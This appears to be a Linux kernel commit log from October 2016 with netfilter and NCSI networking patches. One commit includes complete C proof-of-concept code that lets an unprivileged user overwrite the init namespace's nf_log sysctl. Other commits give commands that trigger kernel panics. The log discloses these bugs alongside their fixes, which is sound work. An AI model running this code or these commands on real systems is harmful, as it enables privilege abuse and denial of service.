1. 12 Oct, 2016 4 commits
  2. 11 Oct, 2016 1 commit
  3. 08 Oct, 2016 4 commits
  4. 07 Oct, 2016 4 commits
  5. 06 Oct, 2016 17 commits
  6. 04 Oct, 2016 10 commits
    • netfilter: nft_limit: fix divided by zero panic · 2fa46c13
      Authored by Liping Zhang
      After I input the following nftables rule, a panic happened on my system:
        # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second
      
        divide error: 0000 [#1] SMP
        [ ... ]
        RIP: 0010:[<ffffffffa059035e>]  [<ffffffffa059035e>]
        nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
        Call Trace:
        [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
        [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
        [<ffffffff81753767>] ? ipt_do_table+0x327/0x610
        [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
        [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
        [<ffffffff816f4aa2>] nf_iterate+0x62/0x80
        [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0
        [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0
        [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0
        [<ffffffff81703d3c>] ip_local_out+0x1c/0x40
      
      This is because the divisor is 64-bit but is treated as a 32-bit integer,
      so 0xf00000000 is truncated to zero, i.e. the divisor becomes 0.
      Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
      Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
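
The truncation described in the nft_limit commit can be reproduced in user space. This is a minimal sketch, not the kernel code: the helper names are hypothetical, and only the value 0xf00000000 comes from the commit message.

```c
#include <stdint.h>

/* Hypothetical stand-in for code that stores a 64-bit rate in a
 * 32-bit divisor; only the low 32 bits survive the conversion. */
static uint32_t divisor_as_u32(uint64_t rate)
{
        return (uint32_t)rate;
}

/* Returns 1 if dividing by the truncated value would divide by zero. */
static int truncated_divisor_is_zero(uint64_t rate)
{
        return divisor_as_u32(rate) == 0;
}
```

Calling `truncated_divisor_is_zero(0xf00000000ULL)` reports that the low 32 bits are all zero, which is the condition that leads to the divide error above.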
    • netfilter: fix namespace handling in nf_log_proc_dostring · dbb5918c
      Authored by Jann Horn
      nf_log_proc_dostring() used current's network namespace instead of the one
      corresponding to the sysctl file the write was performed on. Because the
      permission check happens at open time and the nf_log files in namespaces
      are accessible for the namespace owner, this can be abused by an
      unprivileged user to effectively write to the init namespace's nf_log
      sysctls.
      
      Stash the "struct net *" in extra2 - data and extra1 are already used.
      
      Repro code:
      
      #define _GNU_SOURCE
      #include <stdlib.h>
      #include <sched.h>
      #include <err.h>
      #include <sys/mount.h>
      #include <sys/types.h>
      #include <sys/wait.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <string.h>
      #include <stdio.h>
      
      char child_stack[1000000];
      
      uid_t outer_uid;
      gid_t outer_gid;
      int stolen_fd = -1;
      
      void writefile(char *path, char *buf) {
              int fd = open(path, O_WRONLY);
              if (fd == -1)
                      err(1, "unable to open thing");
              if (write(fd, buf, strlen(buf)) != strlen(buf))
                      err(1, "unable to write thing");
              close(fd);
      }
      
      int child_fn(void *p_) {
              if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                        NULL))
                      err(1, "mount");
      
              /* Yes, we need to set the maps for the net sysctls to recognize us
               * as namespace root.
               */
              char buf[1000];
              sprintf(buf, "0 %d 1\n", (int)outer_uid);
              writefile("/proc/1/uid_map", buf);
              writefile("/proc/1/setgroups", "deny");
              sprintf(buf, "0 %d 1\n", (int)outer_gid);
              writefile("/proc/1/gid_map", buf);
      
              stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
              if (stolen_fd == -1)
                      err(1, "open nf_log");
              return 0;
      }
      
      int main(void) {
              outer_uid = getuid();
              outer_gid = getgid();
      
              int child = clone(child_fn, child_stack + sizeof(child_stack),
                                CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                                |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
              if (child == -1)
                      err(1, "clone");
              int status;
              if (wait(&status) != child)
                      err(1, "wait");
              if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                      errx(1, "child exit status bad");
      
              char *data = "NONE";
              if (write(stolen_fd, data, strlen(data)) != strlen(data))
                      err(1, "write");
              return 0;
      }
      
      Repro:
      
      $ gcc -Wall -o attack attack.c -std=gnu99
      $ cat /proc/sys/net/netfilter/nf_log/2
      nf_log_ipv4
      $ ./attack
      $ cat /proc/sys/net/netfilter/nf_log/2
      NONE
      
      Because this looks like an issue with very low severity, I'm sending it to
      the public list directly.
      Signed-off-by: Jann Horn <jann@thejh.net>
      Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
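
The difference between "current's namespace" and "the namespace the file belongs to" can be modelled in a few lines of user-space C. Everything here is a hypothetical stand-in (struct net_ns, struct ctl_entry, current_ns and both handlers); the only detail taken from the commit is that the owning namespace is stashed in an extra2 pointer.

```c
#include <stdio.h>

/* Hypothetical stand-in for "struct net". */
struct net_ns {
        char logger[16];
};

/* Hypothetical stand-in for a sysctl table entry. */
struct ctl_entry {
        void *data;
        void *extra1;
        void *extra2;   /* the fix stashes the owning namespace here */
};

/* Stand-in for the caller's network namespace at write time. */
static struct net_ns *current_ns;

/* Buggy pattern: the write lands in whatever namespace the caller is in. */
static void write_logger_buggy(struct ctl_entry *e, const char *val)
{
        (void)e;
        snprintf(current_ns->logger, sizeof(current_ns->logger), "%s", val);
}

/* Fixed pattern: the write lands in the namespace the file belongs to. */
static void write_logger_fixed(struct ctl_entry *e, const char *val)
{
        struct net_ns *ns = e->extra2;

        snprintf(ns->logger, sizeof(ns->logger), "%s", val);
}
```

With an entry that belongs to a child namespace and a caller running in the init namespace, the buggy handler modifies the init namespace, while the fixed handler modifies only the child.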
    • net/ncsi: Introduce ncsi_stop_dev() · c0cd1ba4
      Authored by Gavin Shan
      This introduces ncsi_stop_dev(), as the counterpart to ncsi_start_dev(),
      to stop the NCSI device so that it can be re-enabled in the future. This
      API should be called when the network device driver is going to
      shut down the device. The function does three things: stops
      the channel monitoring, resets channels to the inactive state, and
      reports NCSI link down.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net/ncsi: Rework the channel monitoring · 83afdc6a
      Authored by Gavin Shan
      The original NCSI channel monitoring was based on a backoff
      algorithm: the GLS (Get Link Status) response should be received
      within the specified interval. Otherwise, the channel is regarded as
      dead and failover is performed if the current channel is the active one.
      There are several problems in the implementation: (A) On BCM5718,
      we found that when the IID (Instance ID) in the GLS command packet
      changes from 255 to 1, the response corresponding to IID#1 never
      arrives. This means we cannot fairly judge the channel to be
      dead when a single response is missed. (B) The code's
      readability should be improved. (C) We should do failover when
      the current channel is the active one, and the channel monitoring
      should be marked as disabled before doing failover.
      
      This reworks the channel monitoring to address all of the above issues.
      The fields for channel monitoring are put into a separate struct
      and the states of channel monitoring are predefined. The channel
      is regarded as alive if the network controller responds to one of
      two GLS commands, or both of them, within 5 seconds.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
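
The liveness rule from the channel monitoring rework (alive if at least one of two GLS commands is answered within the window) can be sketched as a small state holder. The struct, enum and function names below are hypothetical and are not the kernel's; the timer that ends the 5-second window is assumed to exist elsewhere.

```c
#include <stdbool.h>

/* Hypothetical monitor state; field names are illustrative only. */
struct chan_monitor {
        bool enabled;
        int sent;       /* GLS commands sent in the current window (max 2) */
        int answered;   /* responses seen in the current window */
};

enum verdict { CHAN_PENDING, CHAN_ALIVE, CHAN_DEAD };

static void monitor_start(struct chan_monitor *m)
{
        m->enabled = true;
        m->sent = 0;
        m->answered = 0;
}

static void monitor_sent(struct chan_monitor *m)
{
        if (m->enabled && m->sent < 2)
                m->sent++;
}

static void monitor_response(struct chan_monitor *m)
{
        if (m->enabled)
                m->answered++;
}

/* Called when the window expires (timer not modelled here). */
static enum verdict monitor_window_end(struct chan_monitor *m)
{
        enum verdict v;

        if (!m->enabled)
                return CHAN_PENDING;
        v = m->answered > 0 ? CHAN_ALIVE : CHAN_DEAD;
        if (v == CHAN_DEAD)
                m->enabled = false;     /* disable monitoring before failover */
        m->sent = 0;
        m->answered = 0;
        return v;
}
```

A single missed response no longer condemns the channel in this model: the verdict is CHAN_DEAD only when both commands in a window go unanswered.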
    • net/ncsi: Allow to extend NCSI request properties · a0509cbe
      Authored by Gavin Shan
      There is only one NCSI request property for now: whether the response
      to the sent command needs to drive the workqueue. So we had one
      field (@driven) for the purpose, which left no flexibility to extend
      NCSI request properties.
      
      This replaces @driven with @flags and @req_flags in the NCSI request
      and NCSI command argument structs. Each bit of the newly introduced
      field can be used for one property. No functional changes introduced.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
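
Replacing a single boolean field with a flags word, one bit per property, might look like the sketch below. The macro names, bit values and struct are assumptions made for illustration; the commit message only states that @driven became a bit field.

```c
#include <stdbool.h>

/* Illustrative property bits; names and values are assumptions. */
#define REQ_FLAG_EVENT_DRIVEN   (1u << 0)
#define REQ_FLAG_EXAMPLE_EXTRA  (1u << 1)       /* hypothetical future property */

/* Hypothetical request type carrying the flags word. */
struct request {
        unsigned int flags;
};

static void request_set_flag(struct request *r, unsigned int flag)
{
        r->flags |= flag;
}

static void request_clear_flag(struct request *r, unsigned int flag)
{
        r->flags &= ~flag;
}

/* Equivalent of testing the old boolean field. */
static bool request_is_event_driven(const struct request *r)
{
        return (r->flags & REQ_FLAG_EVENT_DRIVEN) != 0;
}
```

A new property then needs only a new bit definition rather than a new struct field.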
    • net/ncsi: Rework request index allocation · a15af54f
      Authored by Gavin Shan
      The NCSI request index (struct ncsi_request::id) is put into the instance
      ID (IID) field when sending an NCSI command packet. By design, the
      available IDs are handed out in round-robin fashion. @ndp->request_id was
      introduced to represent the next available ID, but it has been used
      as the number of successively allocated IDs, which breaks the round-robin
      design. Besides, we shouldn't put 0 into the NCSI command packet's IID
      field, meaning ID#0 should be reserved according to section 6.3.1.1
      of the NCSI spec (v1.1.0).
      
      This fixes the above two issues. With it applied, the available IDs will
      be assigned in round-robin fashion and ID#0 won't be assigned.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
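
Round-robin ID allocation that never hands out ID 0 can be sketched as follows. This is an illustration of the idea rather than the kernel implementation: struct id_pool and its functions are hypothetical, and the upper bound of 255 is an assumption based on the IID wrapping from 255 to 1 mentioned in the channel monitoring commit.

```c
#include <stdbool.h>

#define REQ_ID_MIN 1    /* ID 0 is reserved */
#define REQ_ID_MAX 255  /* assumption: the IID field is 8 bits wide */

/* Hypothetical allocator state. */
struct id_pool {
        bool used[REQ_ID_MAX + 1];
        int next;       /* next ID to try */
};

static void id_pool_init(struct id_pool *p)
{
        for (int i = 0; i <= REQ_ID_MAX; i++)
                p->used[i] = false;
        p->next = REQ_ID_MIN;
}

/* Returns an ID in [REQ_ID_MIN, REQ_ID_MAX], or -1 if all are in use. */
static int id_pool_alloc(struct id_pool *p)
{
        int id = p->next;

        for (int tried = 0; tried < REQ_ID_MAX; tried++) {
                if (!p->used[id]) {
                        p->used[id] = true;
                        p->next = (id == REQ_ID_MAX) ? REQ_ID_MIN : id + 1;
                        return id;
                }
                id = (id == REQ_ID_MAX) ? REQ_ID_MIN : id + 1;
        }
        return -1;
}

static void id_pool_free(struct id_pool *p, int id)
{
        if (id >= REQ_ID_MIN && id <= REQ_ID_MAX)
                p->used[id] = false;
}
```

Because the search starts at `next` rather than at the lowest free ID, a freed ID is not reused until the allocator has cycled through the rest of the range.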
    • net/ncsi: Don't probe on the reserved channel ID (0x1f) · 55e02d08
      Authored by Gavin Shan
      We needn't send the CIS (Clear Initial State) command to the NCSI
      reserved channel (0x1f) during enumeration. We shouldn't receive
      a valid response to CIS on NCSI channel 0x1f.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net/ncsi: Introduce NCSI_RESERVED_CHANNEL · bc7e0f50
      Authored by Gavin Shan
      This defines NCSI_RESERVED_CHANNEL as the reserved NCSI channel
      ID (0x1f). No logical changes introduced.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
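
Taken together, the two reserved-channel commits amount to naming the value 0x1f and skipping it during enumeration. A minimal sketch, assuming channel IDs span 0 through 0x1f; the helper functions are hypothetical and only the macro name and value come from the commit messages.

```c
#define NCSI_RESERVED_CHANNEL 0x1f      /* value from the commit message */

/* Returns nonzero if a channel ID should be probed during enumeration. */
static int should_probe_channel(int id)
{
        return id != NCSI_RESERVED_CHANNEL;
}

/* Counts the channel IDs that would be probed.
 * The ID range 0..0x1f is an assumption made for this sketch. */
static int count_probed_channels(void)
{
        int n = 0;

        for (int id = 0; id <= 0x1f; id++) {
                if (!should_probe_channel(id))
                        continue;
                n++;
        }
        return n;
}
```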
    • net/ncsi: Avoid unused-value build warning from ia64-linux-gcc · d8cedaab
      Authored by Gavin Shan
      xchg() is used to set the NCSI channel's state for consistent
      access to the state. xchg()'s return value should be used; otherwise,
      a build warning is raised (with -Wunused-value), as the message below
      shows. It was reported by ia64-linux-gcc (GCC) 4.9.0.
      
       net/ncsi/ncsi-manage.c: In function 'ncsi_channel_monitor':
       arch/ia64/include/uapi/asm/cmpxchg.h:56:2: warning: value computed is \
       not used [-Wunused-value]
        ((__typeof__(*(ptr))) __xchg((unsigned long) (x), (ptr), sizeof(*(ptr))))
         ^
       net/ncsi/ncsi-manage.c:202:3: note: in expansion of macro 'xchg'
        xchg(&nc->state, NCSI_CHANNEL_INACTIVE);
      
      This removes the atomic access to the NCSI channel's state to avoid the above
      build warning. We have to hold the channel's lock when its state is read
      or updated. No functional changes introduced.
      Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley <joel@jms.id.au>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • net: Add netdev all_adj_list refcnt propagation to fix panic · 93409033
      Authored by Andrew Collins
      This is a respin of a patch to fix a relatively easily reproducible kernel
      panic related to the all_adj_list handling for netdevs in recent kernels.
      
      The following sequence of commands will reproduce the issue:
      
      ip link add link eth0 name eth0.100 type vlan id 100
      ip link add link eth0 name eth0.200 type vlan id 200
      ip link add name testbr type bridge
      ip link set eth0.100 master testbr
      ip link set eth0.200 master testbr
      ip link add link testbr mac0 type macvlan
      ip link delete dev testbr
      
      This creates an upper/lower tree of (excuse the poor ASCII art):
      
                  /---eth0.100-eth0
      mac0-testbr-
                  \---eth0.200-eth0
      
      When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from
      the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one
      reference to eth0 is added, so this results in a panic.
      
      This change adds reference count propagation so things are handled properly.
      
      Matthias Schiffer reported a similar crash in batman-adv:
      
      https://github.com/freifunk-gluon/gluon/issues/680
      https://www.open-mesh.org/issues/247
      
      which this patch also seems to resolve.
      Signed-off-by: Andrew Collins <acollins@cradlepoint.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
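
The imbalance described in the all_adj_list commit (eth0 reachable over two paths but referenced once) can be modelled with a reference-counted list. This is a simplified user-space model and not the kernel's data structures: struct adj, struct adj_list and the functions are hypothetical, and counting one reference per path is an assumption used to illustrate why the counts must add up.

```c
#include <string.h>

#define MAX_ADJ 8

/* Hypothetical adjacency entry: a device name plus a reference count. */
struct adj {
        const char *name;
        int ref_nr;
};

struct adj_list {
        struct adj e[MAX_ADJ];
        int n;
};

static int adj_find(const struct adj_list *l, const char *name)
{
        for (int i = 0; i < l->n; i++)
                if (strcmp(l->e[i].name, name) == 0)
                        return i;
        return -1;
}

/* Current reference count for a device, 0 if it is not in the list. */
static int adj_refs(const struct adj_list *l, const char *name)
{
        int i = adj_find(l, name);

        return i < 0 ? 0 : l->e[i].ref_nr;
}

/* Adds ref_nr references, creating the entry if needed; -1 if full. */
static int adj_insert(struct adj_list *l, const char *name, int ref_nr)
{
        int i = adj_find(l, name);

        if (i >= 0) {
                l->e[i].ref_nr += ref_nr;
                return 0;
        }
        if (l->n == MAX_ADJ)
                return -1;
        l->e[l->n].name = name;
        l->e[l->n].ref_nr = ref_nr;
        l->n++;
        return 0;
}

/* Drops ref_nr references; -1 means the entry is already gone,
 * which corresponds to the unbalanced delete that caused the panic. */
static int adj_remove(struct adj_list *l, const char *name, int ref_nr)
{
        int i = adj_find(l, name);

        if (i < 0)
                return -1;
        l->e[i].ref_nr -= ref_nr;
        if (l->e[i].ref_nr <= 0)
                l->e[i] = l->e[--l->n];
        return 0;
}
```

If eth0 is inserted once per path in the tree above, it ends up with two references, so the two deletions triggered by removing testbr both succeed instead of the second one hitting a missing entry.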